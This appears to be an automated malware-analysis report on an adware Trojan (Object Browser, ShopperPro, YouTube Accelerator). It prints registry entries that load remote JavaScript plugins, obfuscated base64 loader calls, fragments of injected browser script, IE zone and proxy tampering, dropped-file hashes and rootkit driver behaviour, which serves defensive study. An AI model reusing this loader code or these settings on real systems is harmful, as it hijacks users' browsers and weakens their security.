cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-"

    [HKCU\Software\Object Browser\Plugins\42]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInternal.js"

    [HKCU\Software\Object Browser\Plugins\37]
    "Version" = "6"

    [HKCU\Software\Object Browser\Plugins\17]
    "Version" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\Object Browser\Plugins\47]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/resources_background.js"

    [HKCU\Software\Object Browser\Plugins\269]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY3ODYxNGExYzFhMTMxMzM5MTkwODUwNTI0ODU2MDYxMzE3MWM1MTRiNWQxODEwNWEwMzFlMDIwZjFmMGQwNDBkMWIwMDBmMTMxMDQyMDgwYjFmNDcwOTE3MWEwZTE1MDk0NDBkMTc0NjAyMDc1MTE1MGQwODU2M2IyZDNhMjYzMDMxMzg0MTQwNjE2ZDUwMDAxYzAwMWUxNDM2MWUwNzQ2NDg0ODRhMWMxYTEzMTMxZjUxNGI1ZDBhNWIxYTU2MDk1MDAyNTk0YTAxMWIwNDVhMDYxMDAwMDgwNTRhMWMwZDFjNWIwZjA0MTcwNTFkMDE1ZDAxMGQ1YTA0MTQ1YzFlMDUwMDRmMzczNzI2MjAyMzNjMzM0OTQ4Nzg2MTRhMDQwMjEyMDQwNTA1MmQxNjRhNTI1NDVjNTE1YTY2MTY=', 'drhhtngclk'); }"

    [HKCU\Software\Object Browser\Plugins\183]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/tabsWrapper.js"

    [HKCU\Software\Object Browser\Plugins\28]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/initializer.js"

    [HKCU\Software\Object Browser\Plugins\184]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/noproblemppc_m.js"

    [HKCU\Software\Object Browser\Plugins\45]
    "Name" = "IEOnRequest"

    [HKCU\Software\Object Browser\Manifest]
    "IsButtonEnabled" = "false"

    [HKCU\Software\Object Browser\Plugins\102]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/dealply_m.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Object Browser\Plugins\2]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\42]
    "JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;{H"

    [HKCU\Software\Object Browser\Plugins\21]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\177]
    "JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\Object Browser\Manifest]
    "EnableSearchIE" = "false"

    [HKCU\Software\Object Browser\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKCU\Software\Object Browser\Plugins\38]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\78]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderInfo.js"

    [HKCU\Software\Object Browser\Plugins\91]
    "Name" = "monetizationLoader.js"

    [HKCU\Software\Object Browser\Plugins\102]
    "Name" = "dealply_m"

    [HKCU\Software\Object Browser\Plugins\14]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderUtils.js"

    [HKCU\Software\Object Browser\Plugins\43]
    "Name" = "IEMessaging"

    [HKCU\Software\Object Browser\Plugins\211]
    "Name" = "revizer_ws_dynamic_b2b_light_m"

    [HKCU\Software\Object Browser\Plugins\22]
    "Name" = "resources"

    [HKCU\Software\Object Browser\Plugins\260]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGE2MjYzNDEwYzAxMDQwNTI3MGIxZDRhNTA0MzQ2MWQwNDAxMDI0MzVlNDcxZDEwNGEwNTAyMWMxMTFjMTUwZDFlMDYwNzAxNWUxNjFkMTQ1ZTFiNDUxMzAwMWYwMzQwNDE0ZjQzNTkwYjUzNTI0NDQ3MTE0MTFkNWYwMjE5NWMxNzFjMTQ0ODJkMjYzMjNhMjUzMDM3MjczOTMxMzcyYjJlM2IzZjIxM2IzYzM0MmEyZDViNWQ2MjYzNDEwYzAxMDQwNTAxMmMwMzA0NDg1OTQ0NTcxODAxMDYwOTAyNTI0NTRjMTMwNjVlMDUwMDEwMTIwZDBlMDYxMDEwMTMwMTVjMWExZTA1NDUxMDRiMDUxNDFmMDE0YzQyNWU1ODUyMDU0NTQ2NDQ0NTFkNDIwYzQ0MDkxNzRhMDMxYzE2NDQyZTM3MjkzMTJiMjYyMzI3M2IzZDM0M2EzNTMwMzEzNzJmM2MzNjI2MmU0YTQ2Njk2ZDU3MDAxOTA3MWUxODA2MjMwNzQ2NGY1MDQ3NDQ0OTdiMTU=', 'qhjcdupury'); }"

    [HKCU\Software\Object Browser\Plugins\180]
    "Name" = "bpo_serp_m"

    [HKCU\Software\Object Browser\Plugins\45]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEOnRequest.js"

    [HKCU\Software\Object Browser\Plugins\207]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbacH"

    [HKCU\Software\Object Browser\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\Object Browser\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\Object Browser\Plugins\223]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/imonomy_m.js"

    [HKCU\Software\Object Browser\Plugins\191]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\37]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appA\H"

    [HKCU\Software\Object Browser\Plugins\14]
    "Version" = "11"

    [HKCU\Software\Object Browser\Plugins\35]
    "Name" = "IEAjax"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\Object Browser\Plugins\45]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\39]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEDatabase.js"

    [HKCU\Software\Object Browser\Plugins\46]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn"

    [HKCU\Software\Object Browser\Plugins\14]
    "Name" = "CrossriderUtils"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan deletes the following registry key(s):

    [HKCU\Software\Object Browser\Plugins\28]
    [HKCU\Software\Object Browser\Plugins\46]
    [HKCU\Software\Object Browser\Plugins\78]
    [HKCU\Software\Object Browser\Plugins\47]
    [HKCU\Software\Object Browser\Plugins\191]
    [HKCU\Software\Object Browser\Plugins\21]
    [HKCU\Software\Object Browser\Plugins\22]
    [HKCU\Software\Object Browser\Plugins\45]
    [HKCU\Software\Object Browser\Plugins\42]
    [HKCU\Software\Object Browser\Plugins\43]
    [HKCU\Software\Object Browser\Plugins\40]
    [HKCU\Software\Object Browser\Plugins\41]
    [HKCU\Software\Object Browser\Plugins\184]
    [HKCU\Software\Object Browser\Plugins\211]
    [HKCU\Software\Object Browser\Plugins\182]
    [HKCU\Software\Object Browser\Plugins\217]
    [HKCU\Software\Object Browser\Plugins\180]
    [HKCU\Software\Object Browser\Plugins]
    [HKCU\Software\Object Browser\Plugins\44]
    [HKCU\Software\Object Browser\Plugins\104]
    [HKCU\Software\Object Browser\Plugins\123]
    [HKCU\Software\Object Browser\Plugins\102]
    [HKCU\Software\Object Browser\Plugins\14]
    [HKCU\Software\Object Browser\Plugins\17]
    [HKCU\Software\Object Browser\Plugins\13]
    [HKCU\Software\Object Browser\Plugins\3]
    [HKCU\Software\Object Browser\Plugins\39]
    [HKCU\Software\Object Browser\Plugins\38]
    [HKCU\Software\Object Browser\Plugins\72]
    [HKCU\Software\Object Browser\Plugins\37]
    [HKCU\Software\Object Browser\Plugins\36]
    [HKCU\Software\Object Browser\Plugins\35]
    [HKCU\Software\Object Browser\Plugins\183]
    [HKCU\Software\Object Browser\Plugins\1]
    [HKCU\Software\Object Browser\Plugins\64]
    [HKCU\Software\Object Browser\Plugins\207]
    [HKCU\Software\Object Browser\Plugins\2]
    [HKCU\Software\Object Browser\Plugins\4]
    [HKCU\Software\Object Browser\Plugins\7]
    [HKCU\Software\Object Browser\Plugins\9]
    [HKCU\Software\Object Browser\Plugins\242]
    [HKCU\Software\Object Browser\Plugins\223]
    [HKCU\Software\Object Browser\Plugins\244]
    [HKCU\Software\Object Browser\Plugins\246]
    [HKCU\Software\Object Browser\Plugins\177]
    [HKCU\Software\Object Browser\Plugins\260]
    [HKCU\Software\Object Browser\Plugins\94]
    [HKCU\Software\Object Browser\Plugins\91]
    [HKCU\Software\Object Browser\Plugins\93]

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    Dropped PE files

    MD5 File path
    d63bdbcd4484c24d7e2946972c7e987b c:\Documents and Settings\All Users\Application Data\ShopperPro\ShopperPro.dll
    7a36aa4fa053a01334bee9f27894b00d c:\Documents and Settings\All Users\Application Data\ShopperPro\ShopperPro64.dll
    658e80e36d5619ae834a86c6fd34205e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_16580\cr.exe
    28dd656b64f5af0b40872a4124db9a3b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_16580\iwebar.exe
    9f45a4387401a9cf2cbd1707547b4ee1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_16580\sense.exe
    b284dd3a8425b05805d7f1a9c12291d1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_16580\shopperpro.exe
    a2272fc38c9cf449b8d110edd97e3070 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_16580\sm.exe
    1b2fb86798d5290ccbbc1053a2ce3421 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_16580\yta.exe
    45960b40c1ecb75ed5549a80049879e1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\AniGIF.ocx
    2066f6ded85499f5a14bc18befdc63bd c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\Res.dll
    19fc1db678c37b22b7b38171ee79be57 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\VAUninstall.exe
    ddf964be37f44dfc1d7ecdb05771fc94 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\YouTubeAccelerator.exe
    7bc722e83fa1f233404a874724b7a650 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\YouTubeAcceleratorService.exe
    0ee70cc31caad8658e09232590d9525f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\engine.dll
    54bf861866f55852348bbb32f3d4234d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\helper.dll
    fd129d3b617c36f6b0a46f579019dc02 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\ipc.dll
    9f3f25b5f9077cd7ff3b2f2e7fd46195 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\lspinst.exe
    3ad5c4257fe0f17c2aff1acee205a974 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\lspinst2.exe
    a082e5473b2a9a4d846ed7ddf637ac76 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\sporder.Dll
    62ec4f3ad6dab739b4bac9d83ac9e234 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\testlsp.exe
    a0fcc8a33ae343bd07d3069975d275b4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\unelevate.exe
    0f2aa81cd1f9c89e3b9472a9c8441c17 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\updater.exe
    d58bfdec6032c188a94e382349e756d5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\xmldb.dll
    5ea3c2092b46221453c946fc4f8de919 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SAINST\ytalsp.dll
    534b887e693ce63024bf28fdda3a100d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cabex.dll
    03114dadbd9977fc823f95b21fb987e7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.12695\GoogleCrashHandler.exe
    d858ba2ee718b1db1ced20646e641d08 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.12695\GoogleUpdate.exe
    f98de4108614e4bb81e95e58e36c7000 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.12695\GoogleUpdateBroker.exe
    7e767b342e55eb1dfd74a65d24ea4b70 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.12695\GoogleUpdateOnDemand.exe
    8b0526b3aa98e4b0ebbe555a006e4b37 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.12695\goopdate.dll
    ce1490811d8d6f479560b5bff168b28b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.12695\goopdateres_en.dll
    b956e2b81aba0a0a1a54b33ba5250f78 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.12695\npGoogleUpdate4.dll
    fefef2f226fd6be184bc4a3378b02aaf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.12695\psmachine.dll
    8d90bb3a36521b50d0e512a781e36871 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.12695\psuser.dll
    03114dadbd9977fc823f95b21fb987e7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.194063\GoogleCrashHandler.exe
    d858ba2ee718b1db1ced20646e641d08 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.194063\GoogleUpdate.exe
    f98de4108614e4bb81e95e58e36c7000 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.194063\GoogleUpdateBroker.exe
    7e767b342e55eb1dfd74a65d24ea4b70 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.194063\GoogleUpdateOnDemand.exe
    8b0526b3aa98e4b0ebbe555a006e4b37 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.194063\goopdate.dll
    edea919bc1046d209d88125f0d9b57a5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.194063\goopdateres_en.dll
    b956e2b81aba0a0a1a54b33ba5250f78 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.194063\npGoogleUpdate4.dll
    fefef2f226fd6be184bc4a3378b02aaf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.194063\psmachine.dll
    8d90bb3a36521b50d0e512a781e36871 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.194063\psuser.dll
    03114dadbd9977fc823f95b21fb987e7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.436922\GoogleCrashHandler.exe
    d858ba2ee718b1db1ced20646e641d08 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.436922\GoogleUpdate.exe
    f98de4108614e4bb81e95e58e36c7000 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.436922\GoogleUpdateBroker.exe
    7e767b342e55eb1dfd74a65d24ea4b70 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.436922\GoogleUpdateOnDemand.exe
    8b0526b3aa98e4b0ebbe555a006e4b37 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.436922\goopdate.dll
    ce1490811d8d6f479560b5bff168b28b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.436922\goopdateres_en.dll
    b956e2b81aba0a0a1a54b33ba5250f78 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.436922\npGoogleUpdate4.dll
    fefef2f226fd6be184bc4a3378b02aaf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.436922\psmachine.dll
    8d90bb3a36521b50d0e512a781e36871 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.436922\psuser.dll
    904beebec2790ee2ca0c90fc448ac7e0 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf3.tmp\DcryptDll.dll
    d60121bec57ae7c1ca71b92be6b6ccad c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf3.tmp\setup.exe
    00c345e28d9c6e631888b9e786b5f549 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsv6.tmp\AccDownload.dll
    f0438a894f3a7e01a4aae8d1b5dd0289 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsv6.tmp\nsProcess.dll
    bf712f32249029466fa86756f5546950 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nswA.tmp\System.dll
    30d31b3424ff6b7613eaaf79e9449e0f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nswA.tmp\nsC.tmp
    132e6153717a7f9710dcea4536f364cd c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nswA.tmp\nsExec.dll
    a0fcc8a33ae343bd07d3069975d275b4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\unelevate.exe
    d03e6e3583287207c41182a75e129c0f c:\Program Files\Common Files\Goobzo\GBUpdate\SBIEBrowserHelperObject.dll
    b9b4a868ddc28f8f454a664f7b484c08 c:\Program Files\Common Files\Goobzo\GBUpdate\sma.exe
    d5fd0871044f20d65a1d36b1faeb35dd c:\Program Files\Common Files\Goobzo\GBUpdate\smci32.dll
    944d0b5e9c5c0135d7f30966d971f179 c:\Program Files\Common Files\Goobzo\GBUpdate\smei32.dll
    dc96e7a114a8b01e32db033dd6a852c8 c:\Program Files\Common Files\Goobzo\GBUpdate\smfi32.dll
    996e40f8f93ab20db8bf13ed7681f5d0 c:\Program Files\Common Files\Goobzo\GBUpdate\smi32.exe
    3ec864f74d6e12bc4ee9562a08d40497 c:\Program Files\Common Files\Goobzo\GBUpdate\smoi32.dll
    27278abe87c43f7bc5375ce40e4069ff c:\Program Files\Common Files\Goobzo\GBUpdate\smu.exe
    977856f2ae04fcb7c0de0b3b8bde763e c:\Program Files\Common Files\Goobzo\GBUpdate\smw.sys
    38bd01acb7ef92c3c20fe6aa174320b8 c:\Program Files\Common Files\Goobzo\GBUpdate\un_smw.exe
    ffda90ac32058892ff7fe2f11e3cb8e6 c:\Program Files\Object Browser\Object Browser-codedownloader.exe
    be02046648e875134a1270264c318496 c:\Program Files\Object Browser\Uninstall.exe
    870af3808565b79a3f3656ed460df597 c:\Program Files\Object Browser\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-4.exe
    5c8481e547d0b3451e6b680326468555 c:\Program Files\Object Browser\utils.exe
    5041ee2d2fdb08373770043a42a9a471 c:\Program Files\ShopperPro\JSDriver\jsdrv.exe
    a386f4219f047e432b89329849e1d2f2 c:\Program Files\ShopperPro\JSDriver\jsdrv.sys
    86c8b51f8a4c5d319b724579477a8d8c c:\Program Files\ShopperPro\SPRemove.exe
    d63bdbcd4484c24d7e2946972c7e987b c:\Program Files\ShopperPro\ShopperPro.dll
    6c15ca33b8e5df49ff672a2a30da6d1b c:\Program Files\ShopperPro\ShopperPro.exe
    7a36aa4fa053a01334bee9f27894b00d c:\Program Files\ShopperPro\ShopperPro64.dll
    6a050fb62739b476b96fb41f70b125d9 c:\Program Files\ShopperPro\Updater.exe
    2066f6ded85499f5a14bc18befdc63bd c:\Program Files\YouTube Accelerator\Res.dll
    973567b98cdfc147df4e60471d9df072 c:\Program Files\YouTube Accelerator\UNWISE.EXE
    0f2aa81cd1f9c89e3b9472a9c8441c17 c:\Program Files\YouTube Accelerator\Updater.exe
    4eccfbf440f20fbb7e9007777414fdcb c:\Program Files\YouTube Accelerator\VARemove.exe
    ddf964be37f44dfc1d7ecdb05771fc94 c:\Program Files\YouTube Accelerator\YouTubeAccelerator.exe
    7bc722e83fa1f233404a874724b7a650 c:\Program Files\YouTube Accelerator\YouTubeAcceleratorService.exe
    534b887e693ce63024bf28fdda3a100d c:\Program Files\YouTube Accelerator\cabex.dll
    0ee70cc31caad8658e09232590d9525f c:\Program Files\YouTube Accelerator\engine.dll
    54bf861866f55852348bbb32f3d4234d c:\Program Files\YouTube Accelerator\helper.dll
    fd129d3b617c36f6b0a46f579019dc02 c:\Program Files\YouTube Accelerator\ipc.dll
    9f3f25b5f9077cd7ff3b2f2e7fd46195 c:\Program Files\YouTube Accelerator\lspinst.exe
    3ad5c4257fe0f17c2aff1acee205a974 c:\Program Files\YouTube Accelerator\lspinst2.exe
    a082e5473b2a9a4d846ed7ddf637ac76 c:\Program Files\YouTube Accelerator\sporder.dll
    62ec4f3ad6dab739b4bac9d83ac9e234 c:\Program Files\YouTube Accelerator\testlsp.exe
    a0fcc8a33ae343bd07d3069975d275b4 c:\Program Files\YouTube Accelerator\unelevate.exe
    d58bfdec6032c188a94e382349e756d5 c:\Program Files\YouTube Accelerator\xmldb.dll
    5ea3c2092b46221453c946fc4f8de919 c:\Program Files\YouTube Accelerator\ytalsp.dll
    03114dadbd9977fc823f95b21fb987e7 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe
    d858ba2ee718b1db1ced20646e641d08 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe
    f98de4108614e4bb81e95e58e36c7000 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe
    7e767b342e55eb1dfd74a65d24ea4b70 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe
    8b0526b3aa98e4b0ebbe555a006e4b37 c:\Program Files\globalUpdate\Update\1.3.25.0\goopdate.dll
    edea919bc1046d209d88125f0d9b57a5 c:\Program Files\globalUpdate\Update\1.3.25.0\goopdateres_en.dll
    b956e2b81aba0a0a1a54b33ba5250f78 c:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll
    fefef2f226fd6be184bc4a3378b02aaf c:\Program Files\globalUpdate\Update\1.3.25.0\psmachine.dll
    8d90bb3a36521b50d0e512a781e36871 c:\Program Files\globalUpdate\Update\1.3.25.0\psuser.dll
    d858ba2ee718b1db1ced20646e641d08 c:\Program Files\globalUpdate\Update\GoogleUpdate.exe
    0476ec8bfc440b7848e70eccaf0021c4 c:\Program Files\iWebar\34d16228-9e90-4879-9804-8e38b5180d78-4.exe
    90d9717fe2529d836151bd4067469593 c:\Program Files\iWebar\Uninstall.exe
    a4cbb75b2771e8858d05fd8a22a455d7 c:\Program Files\iWebar\utils.exe
    45960b40c1ecb75ed5549a80049879e1 c:\WINDOWS\system32\AniGIF.ocx

    HOSTS file anomalies

    No changes have been detected.

    Rootkit activity

    Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdate\smw.sys" the Trojan controls creation and closing of processes by installing the process notifier.
    Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdate\smw.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
    Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdate\smw.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.

    Propagation

  • VersionInfo

    Company Name:
    Product Name:
    Product Version: 1.2.2.206
    Legal Copyright:
    Legal Trademarks:
    Original Filename:
    Internal Name:
    File Version: 1.2.2.206
    File Description:
    Comments:
    Language: Language Neutral

    PE Sections

    Name Virtual Address Virtual Size Raw Size Entropy Section MD5
    .text 4096 23522 23552 4.49264 9dfc1bc55ef90dfdde51b4a47a602ee6
    .rdata 28672 4558 4608 3.6294 5801d712ecba58aa87d1e7d1aa24f3aa
    .data 36864 108504 1024 3.41753 f1bf988467c2a1fe94575f6d3e66d158
    .ndata 147456 36864 0 0 d41d8cd98f00b204e9800998ecf8427e
    .rsrc 184320 2992 3072 3.0671 320701dc60e9003e54683516fb086bf8

    Dropped from:

    Downloaded by:

    Similar by SSDeep:

    Similar by Lavasoft Polymorphic Checker:

    URLs

    URL IP
    hxxp://stub.goobzo.com/p.ashx?e=blUJ6JGwk9JN39k7Xfv8ZV9Aufo681yTjA5kVqVgWdAgLxC0aXqYrfeVKhATcvrDNnjgeuHGNQp4nJxtavSnm1i2s6XsF8NY0jd2Ua9SYWgE8SFHLIEPsD LD4ni i1YEiOd5JlEvhcmtYgda2X5ilO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7Tk 54.208.92.111
